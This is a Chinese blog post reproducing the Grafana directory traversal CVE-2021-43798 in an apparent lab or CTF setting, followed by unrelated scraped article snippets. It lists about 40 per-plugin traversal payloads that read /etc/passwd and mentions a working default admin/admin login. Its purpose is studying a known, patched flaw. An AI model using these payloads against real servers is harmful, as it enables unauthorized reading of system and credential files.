sec0nd_
sec0nd_

grafana 目录遍历 (CVE-2021-43798)

前言

详细的漏洞分析见https://blog.csdn.net/weixin_45794666/article/details/123228409

漏洞描述

Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:/public/plugins//,其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。

复现过程

端口是3000
grafana 目录遍历 (CVE-2021-43798)_第1张图片

打开后是个登陆界面
grafana 目录遍历 (CVE-2021-43798)_第2张图片
试了下默认密码admin/admin,没想到进来了…
grafana 目录遍历 (CVE-2021-43798)_第3张图片
好了不玩了,以上不是本次漏洞的复现过程

首先是抓一个包
grafana 目录遍历 (CVE-2021-43798)_第4张图片
构造payload路径,因为漏洞是由插件造成的,不同插件的payload略有差别,下面是几乎所有插件的payload

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

拿第一个举例,把请求路径改为payload路径
grafana 目录遍历 (CVE-2021-43798)_第5张图片
可以读到passwd文件

flag在哪里呢?

在历史命令里面
grafana 目录遍历 (CVE-2021-43798)_第6张图片

修复建议

升级版本或者打补丁

你可能感兴趣的:(web笔记,安全笔记,安全)

  • 2015笔记——富文本 满庭花醉三千客
    鉴于之前遇到富文本的东西,一窍不通,如今是要好好学习学习了,先从最基本的开始吧:屏幕快照2015-12-1016.28.40.png我分别设置了字号、字体颜色、下划线、字体及大小、删除线。接下来给label赋值:屏幕快照2015-12-1016.29.09.png为了直观,我给label添加了背景色。接下来就是看效果了:屏幕快照2015-12-1016.33.43.png是不是很简单呢?加油!
  • 《恋恋笔记本》:不仅仅是爱之絮语 平生灯火
    琼瑶式的浪漫爱情童话,加上好莱坞经典的编织手段,成就了无数影迷津津乐道的一部纯爱经典。象我这个年纪,为此感动和沉醉似乎已不太可能,但竟然也会有一些或柔软或稀奇古怪的感慨。演变中的爱情主题词。季节有寒来暑往,人生有红颜白发。一路走过爱情的旅途,每一程都有不同的风景,不同的感受。年轻的时候,爱是青春不顾一切的燃烧。就像艾丽和诺亚的十七岁一样,每个人也许都曾有那么一个夏天,爱情将青春燃烧得肆无忌惮,燃烧
  • 区块链与数字经济:互联网创业者的未来之路,构建新的商业模式 口碑信息传播者
    在互联网的浪潮下,区块链技术作为一种新型的分布式数据存储技术,正在逐渐改变着我们的商业模式。它以其独特的去中心化、安全性高、透明度高等特点,为数字经济的发展提供了新的契机。对于互联网创业者来说,理解区块链与数字经济的关系,把握这一技术趋势,无疑是开辟未来之路的关键。探索未来,触碰无限可能!国内区块链元宇宙正引领一场前所未有的科技革命,现在正是您加入这场盛宴的最佳时机!在这里,您将亲身体验到一个全新
  • 学习小结记录 歪歪驴 学习网络
    一、TLS(TransportLayerSecurity)握手是建立安全通信通道的关键过程,确保客户端与服务器之间的通信加密和身份验证。以下是TLS1.2和TLS1.3的握手流程详解及对比:TLS1.2握手流程目标:协商加密套件、交换密钥、验证身份步骤:1.ClientHello-客户端发送支持的TLS版本、加密套件列表(如`AES256-GCM-SHA384`)、随机数(ClientRandom
  • 2024年十大返利app排行榜,全网佣金超高的返利平台推荐十款 直返APP淘宝优惠券
    随着电子商务的快速发展和互联网消费的普及,越来越多的人开始关注返利软件。返利软件作为一种便捷的消费理财方式,不仅可以让用户在购物时享受到优惠折扣,还能通过返利机制获得额外的佣金。在这篇文章中,我们将为大家介绍返利软件十大排行榜以及返利佣金最高的APP。月入十万必看!都在挣钱!推荐几个月入几千到几万的靠谱副业项目!(公众号:善士思维笔记)一、直返直返的口号是“返利就用直返”,它强调没有上级赚差价,直
  • 儿子的命还不如一块车窗,你也配做妈妈? 楼上的姨
    最近大中华发生的一连串事件,都充分调动了群众们的情绪,网友们该骂的骂、该赞的赞。但本姨今天不谈论各大圈子的丑闻、猛料进展如何,倒是有件发生在我们身边的事,让本姨瞬间冒火。几天前,无锡江阴城区某小区门前,一位年轻妈妈下车时忘记拔车钥匙。车门自动上锁后,她才发现年幼的儿子被反锁在车内。由于天气炎热,孩子被固定在车后座的安全座椅上,急得满头大汗、哇哇大哭。接下来,孩子妈妈的举动,看起来倒像是个冷血无情的
  • 读书笔记 kissmoonmiss
    读《有钱人为何用长钱包》读了整本书,如果让我用一句话总计,那么我觉得最合适的话就是:你善待钱,钱善待你。而对于现今的我们来说,可能越来越少的人出门还带着钱包,表面上整本书的观点和建议也许不太用的上,但是我想,其实作者希望我们知道的是,我们应该控制好自己的金钱流向,每一笔钱都花在刀刃上,而不是随意花钱从不记账(这里我就想到自己,上大学以来,虽然每个月父母会给一定的生活费,但是从来都是入不敷出,自己从
  • ABAP Cloud 语言版本、Release Contract 与 API 发布全景解析 汪子熙 ABAP百科全书SAPABAP思爱普NetWeaver
    在云时代,ABAP早已不再只是本地ERP系统里的专属语言,而是演变成能够运行在SAPBTP多租户环境中的云原生开发平台。为了确保代码安全、升级无痛以及生态协同,SAP引入了受限语言版本、ReleaseContract和ReleasedAPI三大治理机制。本文立足官方规范与实践案例,先对两种ABAP语言版本的定位做纵向梳理,再横向剖析五类ReleaseContract的边界约束,最终结合真实项目分享
  • OpenHarmony外设驱动移植指南 你我皆是牛马星人 鸿蒙开发HarmonyOSOpenHarmonyharmonyosOpenHarmony鸿蒙开发源码分析迁移学习嵌入式硬件驱动开发
    往期推文全新看点(文中附带最新·鸿蒙全栈学习笔记)鸿蒙(HarmonyOS)北向开发知识点记录~鸿蒙(OpenHarmony)南向开发保姆级知识点汇总~鸿蒙应用开发与鸿蒙系统开发哪个更有前景?嵌入式开发适不适合做鸿蒙南向开发?看完这篇你就了解了~对于大前端开发来说,转鸿蒙开发究竟是福还是祸?鸿蒙岗位需求突增!移动端、PC端、IoT到底该怎么选?记录一场鸿蒙开发岗位面试经历~持续更新中……外设驱动子
  • 【OpenHarmony】鸿蒙开发:轻量系统服务管理|存储机制详解(一) 你我皆是牛马星人 HarmonyOS鸿蒙开发OpenHarmonyharmonyos鸿蒙开发OpenHarmony嵌入式硬件SAStore模块物联网
    往期推文全新看点(文中附带最新·鸿蒙全栈学习笔记)鸿蒙(HarmonyOS)北向开发知识点记录~鸿蒙(OpenHarmony)南向开发保姆级知识点汇总~鸿蒙应用开发与鸿蒙系统开发哪个更有前景?嵌入式开发适不适合做鸿蒙南向开发?看完这篇你就了解了~对于大前端开发来说,转鸿蒙开发究竟是福还是祸?鸿蒙岗位需求突增!移动端、PC端、IoT到底该怎么选?记录一场鸿蒙开发岗位面试经历~持续更新中……一、前言本
  • 如何搭建MySQL主从同步架构:实现数据库高可用与读写分离 Cloud_Begin adb
    前言:在现代Web应用中,数据库往往是性能瓶颈所在。MySQL主从复制(Master-SlaveReplication)是一种常见的数据同步方案,它不仅能提高系统的读取性能,还能增强数据安全性并提供故障转移能力。本文将详细介绍如何从零开始搭建一个MySQL主从同步架构。一、主从复制原理简介MySQL主从复制基于二进制日志(binlog)实现,其核心流程如下:主库(Master)将所有数据更改操作记
  • 什么软件赚钱多 安全可靠2022精选3类赚钱软件 日常购物技巧呀
    小编最近看到有网友在问“赚钱软件哪个赚钱多,又安全?”最近几年受疫情影响,80%人收入有下滑趋势,但有一个行业特别火,那就是手机赚钱,2022年今天也依旧是,这种方法让一些既想在网络上赚钱又想没有门槛,不需要任何技能的人看到了希望,想着利用业余时间做这个可以赚点外快。高省APP佣金更高,模式更好,终端用户不流失。【高省】是一个自用省钱佣金高,分享推广赚钱多的平台,百度有几百万篇报道,也期待你的加入
  • 如何做一个好妈妈 淡墨清荷老师
    孩子在成长过程中母亲起着很重要的作用,特别是在忙碌、复杂的当今社会中,作为一个母亲如何能兼顾自己的工作和孩子的教育问题呢?根据积极心理学的知识我认为要做到以下几点:1.要有平和的心态,这是非常关键的一点。脾气暴躁的母亲会让孩子无所适从,也很没有安全感。养育我的女儿让我感受最深,我自己就是一个脾气很不稳定的人,特别是当自己驮着疲惫的身躯回到家,此时自己的小孩故意跟你闹的时候,自己沉不住气就爆发了,就
  • 平平淡淡,简简单单 HH_木又寸
    你可以幼稚,可以内向,可以女汉子,可以玛丽苏,可以洒脱,可以浪漫,你的存在本身就是一件很美好的事。你的独一无二没人可以代替!看到自己睡觉(打瞌睡)做出的笔记还是挺可爱的,莫名笑出声来哈哈哈哈我总是习惯性的原谅别人,我后悔了好多人,我遇到的很好的人。
  • Kotlin介绍 江上清风山间明月 Androidkotlin开发语言android
    文章目录1.Kotlin是什么?(身份介绍)2.Kotlin为什么受欢迎?(核心魅力-四大亮点)3.Kotlin看起来什么样?(一瞥语法)4.学习Kotlin能做什么?(应用场景)5.给0基础学习者的建议总结一下Kotlin给你的印象1.Kotlin是什么?(身份介绍)一句话定义:Kotlin是一种现代的、简洁的、安全的、实用的编程语言。谁创造的?一家叫JetBrains的公司(他们做了很多程序员
  • 服务器搭建python响应https,python实现简单的https服务器
    以下提供一个简单的方式快速部署一个https服务器,用于非生产环境的测试使用,如果是正式的生产环境,考虑到性能安全等因素,就不要使用这个了。1、使用pyOpenSSL库:#coding:utf-8fromBaseHTTPServerimportHTTPServer,BaseHTTPRequestHandlerfromSocketServerimportThreadingMixInfromSocke
  • C++高频知识点(十三) 源代码•宸 开发语言C++经验分享面经
    文章目录61.vector内存扩展问题,扩容62.单例模式,懒汉模式/饿汉模式,及线程安全问题63.工厂模式及简单工厂模式64.类成员函数后加const,有什么作用?65.指针和引用的区别61.vector内存扩展问题,扩容62.单例模式,懒汉模式/饿汉模式,及线程安全问题63.工厂模式及简单工厂模式64.类成员函数后加const,有什么作用?65.指针和引用的区别之后我会持续更新,如果喜欢我的文
  • Leetcode刷题笔记——哈希表篇 code_lover_forever Leetcode刷题笔记leetcode笔记散列表python
    Leetcode刷题笔记——哈希表篇一、哈希表在面试中的高频考题第一题:两数之和Leetcode1:两数之和:中等题(详情点击链接见原题)给定一个整数数组nums和一个整数目标值target,请你在该数组中找出和为目标值target的那两个整数,并返回它们的数组下标python代码解法classSolution:deftwoSum(self,nums:List[int],target:int)->
  • 基于Web的安全漏洞分析与修复平台设计与实现 计算机毕业设计指导 前端
    基于Web的安全漏洞分析与修复平台设计与实现摘要随着信息化进程的加快,Web系统和企业IT架构愈发复杂,安全漏洞频发已成为影响系统安全运行的主要因素。为解决传统漏洞扫描工具定位不准确、修复建议不完善、响应周期长等问题,本文设计并实现了一套基于Web的安全漏洞分析与修复平台。平台集成漏洞检测、漏洞情报分析、可视化报告生成及自动修复建议模块,支持对网站、服务器、代码仓库等多类型目标进行统一管理与评估。
  • 20200526读书笔记 龙套哥萨克海龙
    阅读1小时,总计1247小时,第1192日阅读《长安与河北之间》第7章通过对魏博的个案研究,探讨在安史乱后一直以兵雄天下著称的河朔三镇为何未能在唐末五代的历史巨变中继续扮演主要角色。魏博是安史乱后唐廷为招抚安史降将所置的河朔三镇之一。之后经代宗、德宗、宪宗等朝,虽屡经叛顺,不过自穆宗以后,魏博与唐廷之间基本形成了以共同承认“河朔故事”为基础的稳定关系。这一中唐以来形成的奉唐天子为正朔,各个藩镇依据
  • 2019-04-16 赵轩妈妈
    2019年4月16日晴星期二亲子日记209篇晚上吃完饭的时候老公问儿子今天在学校里吃的什么饭(老公跟儿子规定每天回家报告在学校里吃的什么,因为刚换了校内托管),儿子说今天中午吃的鸡腿,肉丸子,白菜,还有红烧茄子,不过我没有要茄子,因为我实在是不爱吃茄子,老公说嗯还吃的不错,四个菜。然后又问是校内托管好还是校外托管好?儿子说都好。呵呵这个熊孩子,还挺会给自己找台阶下的。不管是哪里好,只要是安全,健康
  • 《唤醒老虎——启动自我疗愈本能。全书读书总结(君子成人之美——成成) 大道之心
    经过20多天的阅读。终于把《唤醒老虎启动自我疗愈本能》这本书读完了。昨天晚上举行了结营典礼。只是网络结营典礼,但我还是觉得有很重的仪式感。让人意外的是,我和我的搭档居然还获得了将金50元,实在是意外之喜。回顾这20多天的历程。从开始的认真看书,认真写读书笔记。到后来的有些懒散,敷衍。其实我自己都为自己捏了把汗。中间出了一个状况,就是我居然读着读着,把书给弄丢了。全靠着电子书和喜马拉雅听书啃完了中间
  • Python 服务器端与客户端的加密通信(SSL/TLS)解析 现实逃脱计划TA pythonssl网络
    ```htmlPython服务器端与客户端的加密通信(SSL/TLS)解析在当今互联网时代,数据安全变得越来越重要。为了保护数据在传输过程中的安全,使用SSL/TLS协议进行加密通信成为了一种常见的做法。本文将详细介绍如何在Python中实现服务器端和客户端之间的SSL/TLS加密通信。什么是SSL/TLS?SSL(SecureSocketsLayer)和TLS(TransportLayerSec
  • 被骗曝光:博文书院赵春柳梁志国碳项目被骗无法提现?群里发充值截图的都是托!千万别上当! 大盛律道
    已有受害者亏损惨重,曝光:博文书院赵春柳梁志国碳资产投资光伏市场不正规——被骗无法提现!讲述背后事实!随着互联网的普及,数字经济蓬勃发展,各种线上平台如雨后春笋般涌现。然而,在这些看似繁荣的平台中,不乏一些黑平台,它们以欺诈手段骗取用户的财产,给人们的财产安全带来严重威胁!因此,我们有必要提高警惕,防范黑平台诈骗。针对网上素未谋面的牛散大咖,经济学家等推荐网上投资理财、数字经济,数字体育市场,人工
  • Java并发必知必会:核心概念深度梳理与实战要点(二) 码不停蹄的玄黓 javaspringbootspringcloudspringjvm
    1.Java中的synchronized关键字深度解析synchronized是Java并发编程中最核心的同步机制,通过内置锁实现线程安全。它在解决数据竞争、内存可见性和操作原子性问题上是不可或缺的。以下从七个维度全面剖析:1.1底层实现原理:监视器锁(Monitor)1.1.1对象头关联每个Java对象内置一个Monitor监视器锁(存储于对象头的MarkWord中)//使用jol-core查看
  • 2019-09-12郑渊洁家庭教育课-读书笔记 szli2019
    家庭教育不是管理。是示范和引导。父母觉得孩子不行,实际上是爸妈自己不行。如果没有合格的父母,你的孩子是不可能优秀的。家庭教育比学校教育重要,家庭教育能决定孩子的一生。孩子有三个很突出的特点:1、模仿能力强;2、逆反心理强;3、想象力丰富。想要孩子做到任何事情,你先做给他看,你不用说话。教育孩子最忌讳的就是用嘴。闭上你的嘴,抬起你的腿,走你的人生路,演示给孩子看。身教非常重要。你发现孩子有什么问题,
  • 【TypeScript学习笔记】TypeScript 核心知识点 Zaly. Vue学习笔记typescript学习笔记
    目录前言TypeScript核心概念基本类型与高级类型常用内置工具类型类型断言与类型守卫TypeScript在Vue3中的应用Vue3中TypeScript的作用范围Props和Emits的类型定义CompositionAPI中的类型支持前言TypeScript是微软开发的一个开源的编程语言,通过在JavaScript的基础上添加静态类型定义构建而成。TypeScript通过TypeScript编
  • (晚凝厉司寒)我的超雄霸总老公厉司寒全文小说全文 百鸣文库
    (晚凝厉司寒)我的超雄霸总老公厉司寒全文小说全文书名:我的超雄霸总老公主角:厉司寒晚凝简介:我老公,一个超雄的霸总,梦见我们结为夫妻后,便执着地追求了我七年。我无法接受他,但他以我家人的安全威胁我,强行娶我,并将我软禁在别墅。此刻的我,头发被烧光,头皮满是伤痕。脸也肿得不成样子,血迹斑斑。断舌处,还在不断溢血。整个人惨不忍睹,触目惊心厉司寒根本就没认出我来。甚至看向我的眼神,都充斥着嫌弃。仿佛看到
  • 《Vue3笔记》第38节:Vue3项目集成TinyMCE富文本编辑器 Mr.小朱同学 【Vue3项目开发】笔记vue.js前端TinyMCE富文本编辑器tinymcetinymce编辑器Vue3集成tinymce
    前一个小节的内容中,已经介绍了Vue3项目中Quill如何配置highlight.js代码高亮的插件。这个小节来学一个新的富文本编辑器,叫做:TinyMCE。Vue3项目开发(微信文章集合)1.1、运行效果TinyMCE编辑器的效果,如下所示:1.2、安装TinyMCE依赖首先,需要安装tinymce依赖,执行下面命令:#安装依赖npminstalltinymce--save
  • 浅析Vue3(vue3笔记之进阶篇) 唆键盘的小前端 Javascript前端vue笔记vue.js前端前端框架javascriptwindows
    本文是结合实践中和学习技术文章总结出来的笔记(个人使用),如有雷同纯属正常((✿◠‿◠))喜欢的话点个赞,谢谢!有问题欢迎指正!!前面已经讲了基本的Vue生命周期和入门知识,本篇重点介绍Vue3的一些进阶知识1.vue-router路由Vue的路由对比React真是舒服太多了,路由守卫不需要自己配置,还可以方便自己添加一些自定义逻辑,比如在beforeEach加载进度条之类的,这里以Hash路由为
  • 深入浅出Java Annotation(元注解和自定义注解) Josh_Persistence Java Annotation元注解自定义注解
    一、基本概述        Annontation是Java5开始引入的新特征。中文名称一般叫注解。它提供了一种安全的类似注释的机制,用来将任何的信息或元数据(metadata)与程序元素(类、方法、成员变量等)进行关联。     更通俗的意思是为程序的元素(类、方法、成员变量)加上更直观更明了的说明,这些说明信息是与程序的业务逻辑无关,并且是供指定的工具或
  • mysql优化特定类型的查询 annan211 java工作mysql
    本节所介绍的查询优化的技巧都是和特定版本相关的,所以对于未来mysql的版本未必适用。 1 优化count查询 对于count这个函数的网上的大部分资料都是错误的或者是理解的都是一知半解的。在做优化之前我们先来看看 真正的count()函数的作用到底是什么。 count()是一个特殊的函数,有两种非常不同的作用,他可以统计某个列值的数量,也可以统计行数。 在统
  • MAC下安装多版本JDK和切换几种方式 棋子chessman jdk
    环境: MAC AIR,OS X 10.10,64位   历史: 过去 Mac 上的 Java 都是由 Apple 自己提供,只支持到 Java 6,并且OS X 10.7 开始系统并不自带(而是可选安装)(原自带的是1.6)。 后来 Apple 加入 OpenJDK 继续支持 Java 6,而 Java 7 将由 Oracle 负责提供。   在终端中输入jav
  • javaScript (1) Array_06 JavaScriptjava浏览器
    JavaScript 1、运算符   运算符就是完成操作的一系列符号,它有七类:   赋值运算符(=,+=,-=,*=,/=,%=,<<=,>>=,|=,&=)、算术运算符(+,-,*,/,++,--,%)、比较运算符(>,<,<=,>=,==,===,!=,!==)、逻辑运算符(||,&&,!)、条件运算(?:)、位
  • 国内顶级代码分享网站 袁潇含 javajdkoracle.netPHP
           现在国内很多开源网站感觉都是为了利益而做的                  当然利益是肯定的,否则谁也不会免费的去做网站      &
  • Elasticsearch、MongoDB和Hadoop比较 随意而生 mongodbhadoop搜索引擎
      IT界在过去几年中出现了一个有趣的现象。很多新的技术出现并立即拥抱了“大数据”。稍微老一点的技术也会将大数据添进自己的特性,避免落大部队太远,我们看到了不同技术之间的边际的模糊化。假如你有诸如Elasticsearch或者Solr这样的搜索引擎,它们存储着JSON文档,MongoDB存着JSON文档,或者一堆JSON文档存放在一个Hadoop集群的HDFS中。你可以使用这三种配
  • mac os 系统科研软件总结 张亚雄 mac os
    1.1 Microsoft Office for Mac 2011      大客户版,自行搜索。      1.2 Latex (MacTex):      系统环境:https://tug.org/mactex/     &nb
  • Maven实战(四)生命周期 AdyZhang maven
    1. 三套生命周期     Maven拥有三套相互独立的生命周期,它们分别为clean,default和site。 每个生命周期包含一些阶段,这些阶段是有顺序的,并且后面的阶段依赖于前面的阶段,用户和Maven最直接的交互方式就是调用这些生命周期阶段。 以clean生命周期为例,它包含的阶段有pre-clean, clean 和 post
  • Linux下Jenkins迁移 aijuans Jenkins
    1. 将Jenkins程序目录copy过去      源程序在/export/data/tomcatRoot/ofctest-jenkins.jd.com下面            tar -cvzf jenkins.tar.gz ofctest-jenkins.jd.com &
  • request.getInputStream()只能获取一次的问题 ayaoxinchao requestInputstream
    问题:在使用HTTP协议实现应用间接口通信时,服务端读取客户端请求过来的数据,会用到request.getInputStream(),第一次读取的时候可以读取到数据,但是接下来的读取操作都读取不到数据   原因: 1. 一个InputStream对象在被读取完成后,将无法被再次读取,始终返回-1; 2. InputStream并没有实现reset方法(可以重
  • 数据库SQL优化大总结之 百万级数据库优化方案 BigBird2012 SQL优化
    网上关于SQL优化的教程很多,但是比较杂乱。近日有空整理了一下,写出来跟大家分享一下,其中有错误和不足的地方,还请大家纠正补充。 这篇文章我花费了大量的时间查找资料、修改、排版,希望大家阅读之后,感觉好的话推荐给更多的人,让更多的人看到、纠正以及补充。 1.对查询进行优化,要尽量避免全表扫描,首先应考虑在 where 及 order by 涉及的列上建立索引。 2.应尽量避免在 where
  • jsonObject的使用 bijian1013 javajson
            在项目中难免会用java处理json格式的数据,因此封装了一个JSONUtil工具类。 JSONUtil.java package com.bijian.json.study; import java.util.ArrayList; import java.util.Date; import java.util.HashMap;
  • [Zookeeper学习笔记之六]Zookeeper源代码分析之Zookeeper.WatchRegistration bit1129 zookeeper
    Zookeeper类是Zookeeper提供给用户访问Zookeeper service的主要API,它包含了如下几个内部类     首先分析它的内部类,从WatchRegistration开始,为指定的znode path注册一个Watcher,   /** * Register a watcher for a particular p
  • 【Scala十三】Scala核心七:部分应用函数 bit1129 scala
    何为部分应用函数? Partially applied function: A function that’s used in an expression and that misses some of its arguments.For instance, if function f has type Int => Int => Int, then f and f(1) are p
  • Tomcat Error listenerStart 终极大法 ronin47 tomcat
    Tomcat报的错太含糊了,什么错都没报出来,只提示了Error listenerStart。为了调试,我们要获得更详细的日志。可以在WEB-INF/classes目录下新建一个文件叫logging.properties,内容如下 Java代码  handlers = org.apache.juli.FileHandler, java.util.logging.ConsoleHa
  • 不用加减符号实现加减法 BrokenDreams 实现
            今天有群友发了一个问题,要求不用加减符号(包括负号)来实现加减法。         分析一下,先看最简单的情况,假设1+1,按二进制算的话结果是10,可以看到从右往左的第一位变为0,第二位由于进位变为1。    
  • 读《研磨设计模式》-代码笔记-状态模式-State bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* 当一个对象的内在状态改变时允许改变其行为,这个对象看起来像是改变了其类 状态模式主要解决的是当控制一个对象状态的条件表达式过于复杂时的情况 把状态的判断逻辑转移到表示不同状态的一系列类中,可以把复杂的判断逻辑简化 如果在
  • CUDA程序block和thread超出硬件允许值时的异常 cherishLC CUDA
    调用CUDA的核函数时指定block 和 thread大小,该大小可以是dim3类型的(三维数组),只用一维时可以是usigned int型的。 以下程序验证了当block或thread大小超出硬件允许值时会产生异常!!!GPU根本不会执行运算!!! 所以验证结果的正确性很重要!!! 在VS中创建CUDA项目会有一个模板,里面有更详细的状态验证。 以下程序在K5000GPU上跑的。
  • 诡异的超长时间GC问题定位 chenchao051 jvmcmsGChbaseswap
    HBase的GC策略采用PawNew+CMS, 这是大众化的配置,ParNew经常会出现停顿时间特别长的情况,有时候甚至长到令人发指的地步,例如请看如下日志: 2012-10-17T05:54:54.293+0800: 739594.224: [GC 739606.508: [ParNew: 996800K->110720K(996800K), 178.8826900 secs] 3700
  • maven环境快速搭建 daizj 安装mavne环境配置
    一 下载maven 安装maven之前,要先安装jdk及配置JAVA_HOME环境变量。这个安装和配置java环境不用多说。 maven下载地址:http://maven.apache.org/download.html,目前最新的是这个apache-maven-3.2.5-bin.zip,然后解压在任意位置,最好地址中不要带中文字符,这个做java 的都知道,地址中出现中文会出现很多
  • PHP网站安全,避免PHP网站受到攻击的方法 dcj3sjt126com PHP
    对于PHP网站安全主要存在这样几种攻击方式:1、命令注入(Command Injection)2、eval注入(Eval Injection)3、客户端脚本攻击(Script Insertion)4、跨网站脚本攻击(Cross Site Scripting, XSS)5、SQL注入攻击(SQL injection)6、跨网站请求伪造攻击(Cross Site Request Forgerie
  • yii中给CGridView设置默认的排序根据时间倒序的方法 dcj3sjt126com GridView
    public function searchWithRelated() {         $criteria = new CDbCriteria;         $criteria->together = true; //without th
  • Java集合对象和数组对象的转换 dyy_gusi java集合
        在开发中,我们经常需要将集合对象(List,Set)转换为数组对象,或者将数组对象转换为集合对象。Java提供了相互转换的工具,但是我们使用的时候需要注意,不能乱用滥用。 1、数组对象转换为集合对象     最暴力的方式是new一个集合对象,然后遍历数组,依次将数组中的元素放入到新的集合中,但是这样做显然过
  • nginx同一主机部署多个应用 geeksun nginx
    近日有一需求,需要在一台主机上用nginx部署2个php应用,分别是wordpress和wiki,探索了半天,终于部署好了,下面把过程记录下来。 1.   在nginx下创建vhosts目录,用以放置vhost文件。 mkdir vhosts   2.   修改nginx.conf的配置, 在http节点增加下面内容设置,用来包含vhosts里的配置文件 #
  • ubuntu添加admin权限的用户账号 hongtoushizi ubuntuuseradd
    ubuntu创建账号的方式通常用到两种:useradd 和adduser . 本人尝试了useradd方法,步骤如下: 1:useradd    使用useradd时,如果后面不加任何参数的话,如:sudo useradd sysadm 创建出来的用户将是默认的三无用户:无home directory ,无密码,无系统shell。 顾应该如下操作:  
  • 第五章 常用Lua开发库2-JSON库、编码转换、字符串处理 jinnianshilongnian nginxlua
      JSON库   在进行数据传输时JSON格式目前应用广泛,因此从Lua对象与JSON字符串之间相互转换是一个非常常见的功能;目前Lua也有几个JSON库,本人用过cjson、dkjson。其中cjson的语法严格(比如unicode \u0020\u7eaf),要求符合规范否则会解析失败(如\u002),而dkjson相对宽松,当然也可以通过修改cjson的源码来完成
  • Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解 yaerfeng1989 timerquartz定时器
    原创整理不易,转载请注明出处:Spring定时器配置的两种实现方式OpenSymphony Quartz和java Timer详解 代码下载地址:http://www.zuidaima.com/share/1772648445103104.htm 有两种流行Spring定时器配置:Java的Timer类和OpenSymphony的Quartz。 1.Java Timer定时 首先继承jav
  • Linux下df与du两个命令的差别? pda158 linux
     一、df显示文件系统的使用情况,与du比較,就是更全盘化。   最经常使用的就是 df -T,显示文件系统的使用情况并显示文件系统的类型。   举比例如以下:   [root@localhost ~]# df -T   Filesystem                   Type &n
  • [转]SQLite的工具类 ---- 通过反射把Cursor封装到VO对象 ctfzh VOandroidsqlite反射Cursor
    在写DAO层时,觉得从Cursor里一个一个的取出字段值再装到VO(值对象)里太麻烦了,就写了一个工具类,用到了反射,可以把查询记录的值装到对应的VO里,也可以生成该VO的List。   使用时需要注意: 考虑到Android的性能问题,VO没有使用Setter和Getter,而是直接用public的属性。 表中的字段名需要和VO的属性名一样,要是不一样就得在查询的SQL中
  • 该学习笔记用到的Employee表 vipbooks oraclesql工作
        这是我在学习Oracle是用到的Employee表,在该笔记中用到的就是这张表,大家可以用它来学习和练习。 drop table Employee; -- 员工信息表 create table Employee( -- 员工编号 EmpNo number(3) primary key, -- 姓
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他